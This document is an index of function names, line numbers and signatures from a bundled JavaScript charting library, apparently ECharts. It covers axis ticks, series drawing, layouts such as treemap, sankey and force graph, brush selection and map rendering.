function makeCategoryLabelsActually (line 36583) | function makeCategoryLabelsActually(axis, labelModel) {
function makeCategoryTicks (line 36610) | function makeCategoryTicks(axis, tickModel) {
function makeRealNumberLabels (line 36652) | function makeRealNumberLabels(axis) {
function getListCache (line 36669) | function getListCache(axis, prop) {
function listCacheGet (line 36674) | function listCacheGet(cache, key) {
function listCacheSet (line 36682) | function listCacheSet(cache, key, value) {
function makeAutoCategoryInterval (line 36687) | function makeAutoCategoryInterval(axis) {
function calculateCategoryInterval (line 36699) | function calculateCategoryInterval(axis) {
function fetchAutoCategoryIntervalCalculationParams (line 36792) | function fetchAutoCategoryIntervalCalculationParams(axis) {
function makeLabelsByNumericCategoryInterval (line 36805) | function makeLabelsByNumericCategoryInterval(axis, categoryInterval, onl...
function makeLabelsByCustomizedCategoryInterval (line 36865) | function makeLabelsByCustomizedCategoryInterval(axis, categoryInterval, ...
function fixExtentWithBands (line 37183) | function fixExtentWithBands(extent, nTick) {
function fixOnBandTicksCoords (line 37200) | function fixOnBandTicksCoords(axis, ticksCoords, alignWithLabel, clamp) {
function getDefaultLabel (line 37447) | function getDefaultLabel(data, dataIndex) {
function SymbolClz$1 (line 37495) | function SymbolClz$1(data, idx, seriesScope) {
function getScale (line 37516) | function getScale(symbolSize) {
function driftSymbol (line 37520) | function driftSymbol(dx, dy) {
function getLabelDefaultText (line 37786) | function getLabelDefaultText(idx, opt) {
function highDownOnUpdate (line 37799) | function highDownOnUpdate(fromState, toState) {
function SymbolDraw (line 37882) | function SymbolDraw(symbolCtor) {
function symbolNeedsDraw (line 37890) | function symbolNeedsDraw(data, point, idx, opt) {
function updateIncrementalAndHover (line 37998) | function updateIncrementalAndHover(el) {
function normalizeUpdateOpt (line 38015) | function normalizeUpdateOpt(opt) {
function makeSeriesScope (line 38038) | function makeSeriesScope(data) {
function prepareDataCoordInfo (line 38076) | function prepareDataCoordInfo(coordSys, data, valueOrigin) {
function getValueStart (line 38113) | function getValueStart(valueAxis, valueOrigin) {
function getStackedOnPoint (line 38139) | function getStackedOnPoint(dataCoordInfo, coordSys, data, idx) {
function diffData (line 38202) | function diffData(oldData, newData) {
function isPointNull (line 38387) | function isPointNull(p) {
function drawSegment (line 38391) | function drawSegment(
function drawMono (line 38462) | function drawMono(
function drawNonMono (line 38521) | function drawNonMono(
function getBoundingBox (line 38614) | function getBoundingBox(points, smoothConstraint) {
function createGridClipPath (line 38777) | function createGridClipPath(cartesian, hasAnimation, seriesModel) {
function createPolarClipPath (line 38815) | function createPolarClipPath(polar, hasAnimation, seriesModel) {
function createClipPath (line 38842) | function createClipPath(coordSys, hasAnimation, seriesModel) {
function isPointsSame (line 38876) | function isPointsSame(points1, points2) {
function getSmooth (line 38890) | function getSmooth(smooth) {
function getStackedOnPoints (line 38900) | function getStackedOnPoints(coordSys, data, dataCoordInfo) {
function turnPointsIntoStep (line 38913) | function turnPointsIntoStep(points, coordSys, stepTurnAt) {
function getVisualGradient (line 38953) | function getVisualGradient(data, coordSys) {
function getIsIgnoreFunc (line 39046) | function getIsIgnoreFunc(seriesModel, data, coordSys) {
function canShowAllSymbolForCategory (line 39082) | function canShowAllSymbolForCategory(categoryAxis, data) {
function createLineClipPath (line 39109) | function createLineClipPath(coordSys, hasAnimation, seriesModel) {
function dataEach (line 39631) | function dataEach(data, idx) {
function progress (line 39714) | function progress(params, data) {
function dimAxisMapper (line 39881) | function dimAxisMapper(dim) {
function Cartesian2D (line 40002) | function Cartesian2D(name) {
function getAxisType (line 40643) | function getAxisType(axisDim, option) {
function isAxisUsedInTheGrid (line 40744) | function isAxisUsedInTheGrid(axisModel, gridModel, ecModel) {
function Grid (line 40748) | function Grid(gridModel, ecModel, api) {
function fixAxisOnZero (line 40816) | function fixAxisOnZero(axesMap, otherAxisDim, axis, onZeroRecords) {
function canOnZeroToAxis (line 40867) | function canOnZeroToAxis(axis) {
function adjustAxes (line 40912) | function adjustAxes() {
function createAxisCreator (line 41111) | function createAxisCreator(axisType) {
function unionExtent (line 41201) | function unionExtent(data, axis, seriesModel) {
function updateAxisTransform (line 41235) | function updateAxisTransform(axis, coordBase) {
function findAxesModels (line 41260) | function findAxesModels(seriesModel, ecModel) {
function isCartesian2D (line 41280) | function isCartesian2D(seriesModel) {
function endTextLayout (line 41773) | function endTextLayout(opt, textPosition, textRotate, extent) {
function fixMinMaxLabelShow (line 41815) | function fixMinMaxLabelShow(axisModel, labelEls, tickEls) {
function ignoreEl (line 41873) | function ignoreEl(el) {
function isTwoLabelOverlapped (line 41877) | function isTwoLabelOverlapped(current, next, labelLayout) {
function isNameLocationCenter (line 41897) | function isNameLocationCenter(nameLocation) {
function createTicks (line 41902) | function createTicks(ticksCoords, tickTransform, tickEndCoord, tickLineS...
function buildAxisMajorTicks (line 41938) | function buildAxisMajorTicks(axisBuilder, axisModel, opt) {
function buildAxisMinorTicks (line 41966) | function buildAxisMinorTicks(axisBuilder, axisModel, opt) {
function buildAxisLabel (line 42003) | function buildAxisLabel(axisBuilder, axisModel, opt) {
function collect (line 42128) | function collect(ecModel, api) {
function collectAxesInfo (line 42161) | function collectAxesInfo(result, ecModel, api) {
function makeAxisPointerModel (line 42264) | function makeAxisPointerModel(
function collectSeriesInfo (line 42312) | function collectSeriesInfo(result, ecModel) {
function getLinkGroupIndex (line 42356) | function getLinkGroupIndex(linksOption, axis) {
function checkPropInLink (line 42370) | function checkPropInLink(linkPropValue, axisPropValue) {
function fixValue (line 42376) | function fixValue(axisModel) {
function getAxisInfo (line 42423) | function getAxisInfo(axisModel) {
function getAxisPointerModel (line 42428) | function getAxisPointerModel(axisModel) {
function isHandleTrigger (line 42433) | function isHandleTrigger(axisPointerModel) {
function makeKey (line 42441) | function makeKey(model) {
function updateAxisPointer (line 42529) | function updateAxisPointer(axisView, axisModel, ecModel, api, payload, f...
function disposeAxisPointer (line 42541) | function disposeAxisPointer(axisView, ecModel, api) {
function layout$1 (line 42591) | function layout$1(gridModel, axisModel, opt) {
function rectCoordAxisBuildSplitArea (line 42667) | function rectCoordAxisBuildSplitArea(axisView, axisGroup, axisModel, gri...
function rectCoordAxisHandleRemove (line 42755) | function rectCoordAxisHandleRemove(axisView) {
function setLabel (line 43244) | function setLabel(
function fixPosition (line 43265) | function fixPosition(style, labelPositionOutside) {
function getClipArea (line 43435) | function getClipArea(coord, data) {
function removeRect (line 43803) | function removeRect(dataIndex, animationModel, el) {
function removeSector (line 43815) | function removeSector(dataIndex, animationModel, el) {
function isZeroOnPolar (line 43856) | function isZeroOnPolar(layout) {
function updateStyle (line 43862) | function updateStyle(
function getLineWidth (line 43904) | function getLineWidth(itemModel, rawLayout) {
function createLarge (line 43934) | function createLarge(seriesModel, group, incremental) {
function largePathFindDataIndex (line 43993) | function largePathFindDataIndex(largePath, x, y) {
function setLargeStyle (line 44027) | function setLargeStyle(el, seriesModel, data) {
function setLargeBackgroundStyle (line 44037) | function setLargeBackgroundStyle(el, backgroundModel, data) {
function createBackgroundShape (line 44047) | function createBackgroundShape(isHorizontalOrRadial, layout, coord) {
function createBackgroundEl (line 44077) | function createBackgroundEl(coord, isHorizontalOrRadial, layout) {
function LegendVisualProvider (line 44304) | function LegendVisualProvider(getDataWithEncodedVisual, getRawData) {
function updateDataSelected (line 44550) | function updateDataSelected(uid, seriesModel, hasAnimation, api) {
function toggleItemSelected (line 44582) | function toggleItemSelected(el, layout, isSelected, selectedOffset, hasA...
function PiePiece (line 44606) | function PiePiece(data, idx) {
function adjustSingleSide (line 45135) | function adjustSingleSide(list, cx, cy, r, dir, viewWidth, viewHeight, v...
function avoidOverlap (line 45244) | function avoidOverlap(labelLayoutList, cx, cy, r, viewWidth, viewHeight,...
function isPositionCenter (line 45327) | function isPositionCenter(layout) {
function getViewRect (line 45487) | function getViewRect(seriesModel, api) {
function LargeSymbolDraw (line 45945) | function LargeSymbolDraw() {
function IndicatorAxis (line 46276) | function IndicatorAxis(dim, scale, radiusExtent) {
function Radar (line 46325) | function Radar(radarModel, ecModel, api) {
function increaseInterval (line 46467) | function increaseInterval(interval) {
function defaultsShow (line 46580) | function defaultsShow(opt, show) {
function getColorIndex (line 46788) | function getColorIndex(areaOrLine, areaOrLineColorList, idx) {
function normalizeSymbolSize (line 47040) | function normalizeSymbolSize(symbolSize) {
function createSymbol$$1 (line 47058) | function createSymbol$$1(data, idx) {
function updateSymbols (line 47080) | function updateSymbols(oldPoints, newPoints, symbolGroup, data, idx, isI...
function getInitialPoints (line 47103) | function getInitialPoints(points) {
function isValidPoint (line 47301) | function isValidPoint(point) {
function getValueMissingPoint (line 47305) | function getValueMissingPoint(coordSys) {
function getBoundingRect$1 (line 47649) | function getBoundingRect$1(regions) {
function buildGraphic (line 47741) | function buildGraphic(mapRecord, boundingRect) {
function makeInvoker (line 47881) | function makeInvoker(methodName) {
function mapNotExistsError (line 47895) | function mapNotExistsError(mapName) {
function retrieveMap (line 47903) | function retrieveMap(mapName) {
function take (line 48192) | function take(zr, resourceKey, userKey) {
function release (line 48197) | function release(zr, resourceKey, userKey) {
function isTaken (line 48206) | function isTaken(zr, resourceKey) {
function getStore (line 48210) | function getStore(zr) {
function RoamController (line 48252) | function RoamController(zr) {
function mousedown (line 48352) | function mousedown(e) {
function mousemove (line 48371) | function mousemove(e) {
function mouseup (line 48399) | function mouseup(e) {
function mousewheel (line 48405) | function mousewheel(e) {
function pinch (line 48450) | function pinch(e) {
function checkPointerAndTrigger (line 48460) | function checkPointerAndTrigger(controller, eventName, behaviorToCheck, ...
function trigger (line 48473) | function trigger(controller, eventName, behaviorToCheck, e, contollerEve...
function isAvailableBehavior (line 48486) | function isAvailableBehavior(behaviorToCheck, e, settings) {
function updateViewOnPan (line 48519) | function updateViewOnPan(controllerHost, dx, dy) {
function updateViewOnZoom (line 48535) | function updateViewOnZoom(controllerHost, zoomDelta, zoomX, zoomY) {
function onIrrelevantElement (line 48588) | function onIrrelevantElement(e, api, targetCoordSysModel) {
function getFixedItemStyle (line 48617) | function getFixedItemStyle(model) {
function updateMapSelectHandler (line 48630) | function updateMapSelectHandler(mapDraw, mapOrGeoModel, regionsGroup, ap...
function updateMapSelected (line 48672) | function updateMapSelected(mapOrGeoModel, regionsGroup) {
function MapDraw (line 48686) | function MapDraw(api, updateGroup) {
function makeActionBase (line 48987) | function makeActionBase() {
function onRegionHighDown (line 49227) | function onRegionHighDown(toHighOrDown) {
function enterRegionHighDown (line 49234) | function enterRegionHighDown(highDownRecord, toHighOrDown) {
function updateCenterAndZoom (line 49290) | function updateCenterAndZoom(
function TransformDummy (line 49431) | function TransformDummy() {
function View (line 49436) | function View(name) {
function doConvert$1 (line 49715) | function doConvert$1(methodName, ecModel, finder, value) {
function Geo (line 49752) | function Geo(name, map$$1, nameMap, invertLongitute) {
function doConvert (line 49910) | function doConvert(methodName, ecModel, finder, value) {
function resizeGeo (line 49950) | function resizeGeo(geoModel, api) {
function setGeoCoords (line 50036) | function setGeoCoords(geo, model) {
function dataStatistics (line 50290) | function dataStatistics(datas, statisticType) {
function linkList (line 50479) | function linkList(opt) {
function transferInjection (line 50512) | function transferInjection(opt, res) {
function changeInjection (line 50526) | function changeInjection(opt, res) {
function cloneShallowInjection (line 50531) | function cloneShallowInjection(opt, res) {
function getLinkedData (line 50549) | function getLinkedData(dataType) {
function isMainData (line 50556) | function isMainData(data) {
function linkAll (line 50560) | function linkAll(mainData, datas, opt) {
function linkSingle (line 50567) | function linkSingle(data, dataType, mainData, opt) {
function Tree (line 50918) | function Tree(hostModel, levelOptions, leavesOption) {
function buildHierarchy (line 51057) | function buildHierarchy(dataNode, parentNode) {
function addChild (line 51107) | function addChild(child, node) {
function beforeLink (line 51164) | function beforeLink(nodeData) {
function init$2 (line 51353) | function init$2(root) {
function firstWalk (line 51405) | function firstWalk(node, separation) {
function secondWalk (line 51442) | function secondWalk(node) {
function separation (line 51449) | function separation(cb) {
function radialCoordinate (line 51460) | function radialCoordinate(x, y) {
function getViewRect$1 (line 51475) | function getViewRect$1(seriesModel, api) {
function executeShifts (line 51495) | function executeShifts(node) {
function apportion (line 51529) | function apportion(subtreeV, subtreeW, ancestor, separation) {
function nextRight (line 51580) | function nextRight(node) {
function nextLeft (line 51593) | function nextLeft(node) {
function nextAncestor (line 51607) | function nextAncestor(nodeInLeft, node, ancestor) {
function moveSubtree (line 51625) | function moveSubtree(wl, wr, shift) {
function defaultSeparation (line 51640) | function defaultSeparation(node1, node2) {
function symbolNeedsDraw$1 (line 51959) | function symbolNeedsDraw$1(data, dataIndex) {
function getTreeNodeStyle (line 51967) | function getTreeNodeStyle(node, itemModel, seriesScope) {
function updateNode (line 51985) | function updateNode(data, dataIndex, symbolEl, group, seriesModel, serie...
function drawEdge (line 52084) | function drawEdge(
function removeNode (line 52145) | function removeNode(data, dataIndex, symbolEl, group, seriesModel, serie...
function getEdgeShape (line 52206) | function getEdgeShape(seriesScope, sourceLayout, targetLayout) {
function eachAfter (line 52350) | function eachAfter(root, callback, separation) {
function eachBefore (line 52377) | function eachBefore(root, callback) {
function commonLayout (line 52418) | function commonLayout(seriesModel, api) {
function retrieveTargetInfo (line 52550) | function retrieveTargetInfo(payload, validPayloadTypes, seriesModel) {
function getPathToRoot (line 52571) | function getPathToRoot(node) {
function aboveViewRoot (line 52580) | function aboveViewRoot(viewRoot, node) {
function wrapTreePathInfo (line 52586) | function wrapTreePathInfo(node, seriesModel) {
function completeTreeValue (line 52907) | function completeTreeValue(dataNode) {
function setDefault (line 52944) | function setDefault(levels, ecModel) {
function Breadcrumb (line 52995) | function Breadcrumb(containerGroup) {
function makeItemPoints (line 53124) | function makeItemPoints(x, y, itemWidth, itemHeight, head, tail) {
function packEventData (line 53137) | function packEventData(el, seriesModel, itemNode) {
function createWrap (line 53188) | function createWrap() {
function dualTravel (line 53476) | function dualTravel(thisViewChildren, oldViewChildren, parentGroup, same...
function clearStorage (line 53517) | function clearStorage(storage) {
function renderFinally (line 53528) | function renderFinally() {
function onSelect (line 53828) | function onSelect(node) {
function createStorage (line 53918) | function createStorage() {
function renderNode (line 53926) | function renderNode(
function calculateZ (line 54217) | function calculateZ(depth, zInLevel) {
function handleRootToNode (line 54266) | function handleRootToNode(model, index) {
function preprocessForPiecewise (line 54532) | function preprocessForPiecewise(thisOption) {
function preprocessForSpecifiedCategory (line 54546) | function preprocessForSpecifiedCategory(thisOption) {
function normalizeVisualRange (line 54583) | function normalizeVisualRange(thisOption, isCategory) {
function makePartialColorVisualHandler (line 54609) | function makePartialColorVisualHandler(applyValue) {
function doMapToArray (line 54620) | function doMapToArray(normalized) {
function makeApplyVisual (line 54627) | function makeApplyVisual(visualType) {
function doMapCategory (line 54633) | function doMapCategory(normalized) {
function doMapFixed (line 54642) | function doMapFixed() {
function makeDoMap (line 54646) | function makeDoMap(sourceExtent) {
function getSpecifiedVisual (line 54663) | function getSpecifiedVisual(value) {
function setVisualToOption (line 54675) | function setVisualToOption(thisOption, visualArr) {
function updatePossible (line 54905) | function updatePossible(val, index) {
function littleThan (line 54915) | function littleThan(close, a, b) {
function travelTree (line 54968) | function travelTree(
function buildVisuals (line 55026) | function buildVisuals(
function calculateColor (line 55044) | function calculateColor(visuals) {
function calculateBorderColor (line 55061) | function calculateBorderColor(borderColorSaturation, thisNodeColor) {
function getValueVisualDefine (line 55067) | function getValueVisualDefine(visuals, name) {
function buildVisualMapping (line 55074) | function buildVisualMapping(
function getRangeVisual (line 55131) | function getRangeVisual(nodeModel, name) {
function mapVisual$1 (line 55138) | function mapVisual$1(nodeModel, visuals, child, index, mapping, seriesMo...
function squarify (line 55320) | function squarify(node, options, hideChildren, depth) {
function initChildren (line 55407) | function initChildren(node, nodeModel, totalArea, options, hideChildren,...
function filterByThreshold (line 55459) | function filterByThreshold(nodeModel, totalArea, sum, orderBy, orderedCh...
function sort$1 (line 55492) | function sort$1(viewChildren, orderBy) {
function statistic (line 55510) | function statistic(nodeModel, children, orderBy) {
function worst (line 55553) | function worst(row, rowFixedLength, ratio) {
function position (line 55579) | function position(row, rowFixedLength, rect, halfGapWidth, flush) {
function estimateRootSize (line 55626) | function estimateRootSize(seriesModel, targetInfo, viewRoot, containerWi...
function calculateRootPosition (line 55672) | function calculateRootPosition(layoutInfo, rootRect, targetInfo) {
function prunning (line 55711) | function prunning(node, clipRect, viewAbovePath, viewRoot, depth) {
function getUpperLabelHeight (line 55745) | function getUpperLabelHeight(model) {
function generateNodeKey (line 55791) | function generateNodeKey(id) {
function Node (line 56126) | function Node(id, dataIndex) {
function Edge (line 56202) | function Edge(n1, n2, dataIndex) {
function getCategoriesData (line 56416) | function getCategoriesData() {
function beforeLink (line 56451) | function beforeLink(nodeData, edgeData) {
function isLine (line 56697) | function isLine(shape) {
function makeSymbolTypeKey (line 56768) | function makeSymbolTypeKey(symbolCategory) {
function createSymbol$1 (line 56774) | function createSymbol$1(name, lineData, idx) {
function createLine (line 56796) | function createLine(points) {
function setLinePoints (line 56805) | function setLinePoints(targetShape, points) {
function updateSymbolAndLabelBeforeLineUpdate (line 56823) | function updateSymbolAndLabelBeforeLineUpdate() {
function Line$1 (line 56981) | function Line$1(lineData, idx, seriesScope) {
function LineDraw (line 57228) | function LineDraw(ctor) {
function doAdd (line 57271) | function doAdd(lineDraw, lineData, idx, seriesScope) {
function doUpdate (line 57283) | function doUpdate(lineDraw, oldLineData, newLineData, oldIdx, newIdx, se...
function updateIncrementalAndHover (line 57323) | function updateIncrementalAndHover(el) {
function makeSeriesScope$1 (line 57342) | function makeSeriesScope$1(lineData) {
function isPointNaN (line 57365) | function isPointNaN(pt) {
function lineNeedsDraw (line 57369) | function lineNeedsDraw(pts) {
function getNodeGlobalScale (line 57392) | function getNodeGlobalScale(seriesModel) {
function getSymbolSize$1 (line 57409) | function getSymbolSize$1(node) {
function intersectCurveCircle (line 57442) | function intersectCurveCircle(curvePoints, center, radius) {
function getItemOpacity (line 57611) | function getItemOpacity(item, opacityPath) {
function fadeOutItem (line 57616) | function fadeOutItem(item, opacityPath, opacityRatio) {
function fadeInItem (line 57637) | function fadeInItem(item, opacityPath) {
function normalize$1 (line 58220) | function normalize$1(a) {
function simpleLayout$1 (line 58291) | function simpleLayout$1(seriesModel) {
function simpleLayoutEdge (line 58306) | function simpleLayoutEdge(graph) {
function circularLayout$1 (line 58425) | function circularLayout$1(seriesModel, basedOn) {
function forceLayout$1 (line 58591) | function forceLayout$1(nodes, edges, opts) {
function getViewRect$2 (line 58885) | function getViewRect$2(seriesModel, api, aspect) {
function parsePosition (line 59193) | function parsePosition(seriesModel, api) {
function formatLabel (line 59209) | function formatLabel(label, labelFormatter) {
function FunnelPiece (line 59753) | function FunnelPiece(data, idx) {
function getViewRect$3 (line 59966) | function getViewRect$3(seriesModel, api) {
function getSortedIndices (line 59975) | function getSortedIndices(data, sort) {
function labelLayout$1 (line 59998) | function labelLayout$1(data) {
function createParallelIfNeeded (line 60255) | function createParallelIfNeeded(option) {
function mergeAxisOptionFromParallel (line 60277) | function mergeAxisOptionFromParallel(option) {
function getSpanSign (line 60453) | function getSpanSign(handleEnds, handleIndex) {
function restrict$1 (line 60460) | function restrict$1(value, extend) {
function Parallel (line 60500) | function Parallel(parallelModel, ecModel, api) {
function restrict (line 60956) | function restrict(len, extent) {
function layoutAxisWithoutExpand (line 60960) | function layoutAxisWithoutExpand(axisIndex, layoutInfo) {
function layoutAxisWithExpand (line 60969) | function layoutAxisWithExpand(axisIndex, layoutInfo) {
function create$2 (line 61027) | function create$2(ecModel, api) {
function getAxisType$1 (line 61194) | function getAxisType$1(axisName, option) {
function BrushController (line 61465) | function BrushController(zr) {
function getKey (line 61692) | function getKey(brushOption, index) {
function oldGetKey (line 61697) | function oldGetKey(cover, index) {
function addOrUpdate (line 61701) | function addOrUpdate(newIndex, oldIndex) {
function remove (line 61719) | function remove(oldIndex) {
function doEnableBrush (line 61754) | function doEnableBrush(controller, brushOption) {
function doDisableBrush (line 61768) | function doDisableBrush(controller) {
function mountHandlers (line 61778) | function mountHandlers(zr, handlers) {
function unmountHandlers (line 61784) | function unmountHandlers(zr, handlers) {
function createCover (line 61790) | function createCover(controller, brushOption) {
function endCreating (line 61798) | function endCreating(controller, creatingCover) {
function updateCoverShape (line 61807) | function updateCoverShape(controller, cover) {
function updateZ$1 (line 61814) | function updateZ$1(cover, brushOption) {
function updateCoverAfterCreation (line 61823) | function updateCoverAfterCreation(controller, cover) {
function getCoverRenderer (line 61828) | function getCoverRenderer(cover) {
function getPanelByPoint (line 61833) | function getPanelByPoint(controller, e, localCursorPoint) {
function getPanelByCover (line 61847) | function getPanelByCover(controller, cover) {
function clearCovers (line 61858) | function clearCovers(controller) {
function trigger$1 (line 61869) | function trigger$1(controller, opt) {
function shouldShowCover (line 61886) | function shouldShowCover(controller) {
function getTrackEnds (line 61902) | function getTrackEnds(track) {
function createBaseRectCover (line 61908) | function createBaseRectCover(doDrift, controller, brushOption, edgeNames) {
function updateBaseRect (line 61939) | function updateBaseRect(controller, cover, localRange, brushOption) {
function updateCommon (line 61970) | function updateCommon(controller, cover) {
function updateRectShape (line 61996) | function updateRectShape(controller, cover, name, x, y, w, h) {
function makeStyle (line 62003) | function makeStyle(brushOption) {
function formatRectRange (line 62007) | function formatRectRange(x, y, x2, y2) {
function getTransform$1 (line 62017) | function getTransform$1(controller) {
function getGlobalDirection (line 62021) | function getGlobalDirection(controller, localDirection) {
function driftRect (line 62041) | function driftRect(toRectRange, fromRectRange, controller, cover, name, ...
function driftPolygon (line 62059) | function driftPolygon(controller, cover, dx, dy, e) {
function toLocalDelta (line 62072) | function toLocalDelta(controller, dx, dy) {
function clipByPanel (line 62080) | function clipByPanel(controller, cover, data) {
function pointsToRect (line 62088) | function pointsToRect(points) {
function resetCursor (line 62102) | function resetCursor(controller, e, localCursorPoint) {
function preventDefault (line 62137) | function preventDefault(e) {
function mainShapeContain (line 62142) | function mainShapeContain(cover, x, y) {
function updateCoverByMouse (line 62146) | function updateCoverByMouse(controller, e, localCursorPoint, isEnd) {
function determineBrushType (line 62201) | function determineBrushType(brushType, panel) {
function handleDragEnd (line 62259) | function handleDragEnd(controller, e) {
function isOutsideZrArea (line 62278) | function isOutsideZrArea(controller, x, y) {
function getLineRenderer (line 62359) | function getLineRenderer(xyIndex) {
function makeRectPanelClipPath (line 62428) | function makeRectPanelClipPath(rect) {
function makeLinearBrushOtherExtent (line 62435) | function makeLinearBrushOtherExtent(rect, specifiedXYIndex) {
function makeRectIsTargetByCursor (line 62445) | function makeRectIsTargetByCursor(rect, api, targetModel) {
function normalizeRect (line 62454) | function normalizeRect(rect) {
function fromAxisAreaSelect (line 62623) | function fromAxisAreaSelect(axisModel, ecModel, payload) {
function getCoverInfoList (line 62631) | function getCoverInfoList(axisModel) {
function getCoordSysModel (line 62645) | function getCoordSysModel(axisModel, ecModel) {
function checkTrigger (line 62792) | function checkTrigger(view, triggerOn) {
function setEncodeAndDimensions (line 62887) | function setEncodeAndDimensions(source, seriesModel) {
function convertDimNameToNumber (line 62913) | function convertDimNameToNumber(dimName) {
function add (line 62980) | function add(newDataIndex) {
function update (line 62985) | function update(newDataIndex, oldDataIndex) {
function remove (line 62995) | function remove(oldDataIndex) {
function createGridClipShape (line 63076) | function createGridClipShape(coordSys, seriesModel, cb) {
function createLinePoints (line 63099) | function createLinePoints(data, dataIndex, dimensions, coordSys) {
function addEl (line 63111) | function addEl(data, dataGroup, dataIndex, dimensions, coordSys) {
function makeSeriesScope$2 (line 63123) | function makeSeriesScope$2(seriesModel) {
function updateElCommon (line 63132) | function updateElCommon(el, data, dataIndex, seriesScope) {
function isEmptyValue (line 63175) | function isEmptyValue(val, axisType) {
function progress (line 63231) | function progress(params, data) {
function beforeLink (line 63320) | function beforeLink(nodeData, edgeData) {
function getItemOpacity$1 (line 63507) | function getItemOpacity$1(item, opacityPath) {
function fadeOutItem$1 (line 63511) | function fadeOutItem$1(item, opacityPath, opacityRatio) {
function fadeInItem$1 (line 63528) | function fadeInItem$1(item, opacityPath) {
function createGridClipShape$1 (line 63928) | function createGridClipShape$1(rect, seriesModel, cb) {
function getViewRect$4 (line 64037) | function getViewRect$4(seriesModel, api) {
function layoutSankey (line 64046) | function layoutSankey(nodes, edges, nodeWidth, nodeGap, width, height, i...
function computeNodeValues (line 64057) | function computeNodeValues(nodes) {
function computeNodeBreadths (line 64077) | function computeNodeBreadths(nodes, edges, nodeWidth, width, height, ori...
function isNodeDepth (line 64148) | function isNodeDepth(node) {
function adjustNodeWithNodeAlign (line 64153) | function adjustNodeWithNodeAlign(nodes, nodeAlign, orient, maxDepth) {
function moveSinksRight (line 64192) | function moveSinksRight(nodes, maxDepth) {
function scaleNodeBreadths (line 64206) | function scaleNodeBreadths(nodes, kx, orient) {
function computeNodeDepths (line 64225) | function computeNodeDepths(nodes, edges, height, width, nodeGap, iterati...
function prepareNodesByBreadth (line 64242) | function prepareNodesByBreadth(nodes, orient) {
function initializeNodeDepth (line 64269) | function initializeNodeDepth(nodesByBreadth, edges, height, width, nodeG...
function resolveCollisions (line 64314) | function resolveCollisions(nodesByBreadth, nodeGap, height, width, orien...
function relaxRightToLeft (line 64369) | function relaxRightToLeft(nodesByBreadth, alpha, orient) {
function weightedTarget (line 64388) | function weightedTarget(edge, orient) {
function weightedSource (line 64392) | function weightedSource(edge, orient) {
function center$1 (line 64396) | function center$1(node, orient) {
function getEdgeValue (line 64402) | function getEdgeValue(edge) {
function sum (line 64406) | function sum(array, cb, orient) {
function relaxLeftToRight (line 64426) | function relaxLeftToRight(nodesByBreadth, alpha, orient) {
function computeEdgeDepths (line 64450) | function computeEdgeDepths(nodes, orient) {
function createNormalBox (line 64887) | function createNormalBox(itemLayout, data, dataIndex, constDim, isInit) {
function updateNormalBoxData (line 64903) | function updateNormalBoxData(itemLayout, el, data, dataIndex, isInit) {
function transInit (line 64930) | function transInit(points, dim, itemLayout) {
function groupSeriesByAxis (line 65037) | function groupSeriesByAxis(ecModel) {
function calculateBase (line 65060) | function calculateBase(groupItem) {
function layoutSingleSeries (line 65112) | function layoutSingleSeries(seriesModel, offset, boxWidth) {
function createNormalBox$1 (line 65526) | function createNormalBox$1(itemLayout, dataIndex, isInit) {
function isNormalBoxClipped (line 65538) | function isNormalBoxClipped(clipArea, itemLayout) {
function setBoxCommon (line 65550) | function setBoxCommon(el, data, dataIndex, isSimpleBox) {
function transInit$1 (line 65571) | function transInit$1(points, itemLayout) {
function createLarge$1 (line 65604) | function createLarge$1(seriesModel, group, incremental) {
function setLargeStyle$1 (line 65628) | function setLargeStyle$1(sign, el, seriesModel, data) {
function progress (line 65730) | function progress(params, data) {
function getColor (line 65746) | function getColor(sign, model) {
function getBorderColor (line 65752) | function getBorderColor(sign, model) {
function normalProgress (line 65821) | function normalProgress(params, data) {
function largeProgress (line 65905) | function largeProgress(params, data) {
function getSign (line 65945) | function getSign(data, dataIndex, openVal, closeVal, closeDim) {
function calculateCandleWidth (line 65964) | function calculateCandleWidth(seriesModel, data) {
function normalizeSymbolSize$1 (line 66118) | function normalizeSymbolSize$1(symbolSize) {
function updateRipplePath (line 66125) | function updateRipplePath(rippleGroup, effectCfg) {
function EffectSymbol (line 66144) | function EffectSymbol(data, idx) {
function compatEc2 (line 66437) | function compatEc2(seriesOpt) {
function EffectLine (line 66770) | function EffectLine(lineData, idx, seriesScope) {
function Polyline$2 (line 66987) | function Polyline$2(lineData, idx, seriesScope) {
function EffectPolyline (line 67086) | function EffectPolyline(lineData, idx, seriesScope) {
function LargeLineDraw (line 67296) | function LargeLineDraw() {
function progress (line 67453) | function progress(params, lineData) {
function normalize$2 (line 67721) | function normalize$2(a) {
function dataEach (line 67743) | function dataEach(data, idx) {
function Heatmap (line 67872) | function Heatmap() {
function getIsInPiecewiseRange (line 68027) | function getIsInPiecewiseRange(dataExtent, pieceList, selected) {
function getIsInContinuousRange (line 68062) | function getIsInContinuousRange(dataExtent, range) {
function isGeoCoordSys (line 68073) | function isGeoCoordSys(coordSys) {
function getSymbolMeta (line 68543) | function getSymbolMeta(data, dataIndex, itemModel, opt) {
function prepareBarLength (line 68597) | function prepareBarLength(itemModel, symbolRepeat, layout, opt, output) {
function convertToCoordOnAxis (line 68632) | function convertToCoordOnAxis(axis, value) {
function prepareSymbolSize (line 68637) | function prepareSymbolSize(
function prepareLineWidth (line 68681) | function prepareLineWidth(itemModel, symbolScale, rotation, opt, output) {
function prepareLayoutInfo (line 68700) | function prepareLayoutInfo(
function createPath (line 68789) | function createPath(symbolMeta) {
function createOrUpdateRepeatSymbols (line 68810) | function createOrUpdateRepeatSymbols(bar, opt, symbolMeta, isUpdate) {
function createOrUpdateSingleSymbol (line 68900) | function createOrUpdateSingleSymbol(bar, opt, symbolMeta, isUpdate) {
function createOrUpdateBarRect (line 68952) | function createOrUpdateBarRect(bar, symbolMeta, isUpdate) {
function createOrUpdateClip (line 68975) | function createOrUpdateClip(bar, opt, symbolMeta, isUpdate) {
function getItemModel (line 69005) | function getItemModel(data, dataIndex) {
function getAnimationDelayParams (line 69012) | function getAnimationDelayParams(path) {
function isAnimationEnabled (line 69020) | function isAnimationEnabled() {
function updateHoverAnimation (line 69025) | function updateHoverAnimation(path, symbolMeta) {
function createBar (line 69043) | function createBar(data, opt, symbolMeta, isUpdate) {
function updateBar (line 69069) | function updateBar(bar, opt, symbolMeta) {
function removeBar (line 69090) | function removeBar(data, dataIndex, animationModel, bar) {
function getShapeStr (line 69116) | function getShapeStr(data, symbolMeta) {
function eachPath (line 69124) | function eachPath(bar, cb, context) {
function updateAttr (line 69131) | function updateAttr(el, immediateAttrs, animationAttrs, symbolMeta, isUp...
function updateCommon$1 (line 69144) | function updateCommon$1(bar, opt, symbolMeta) {
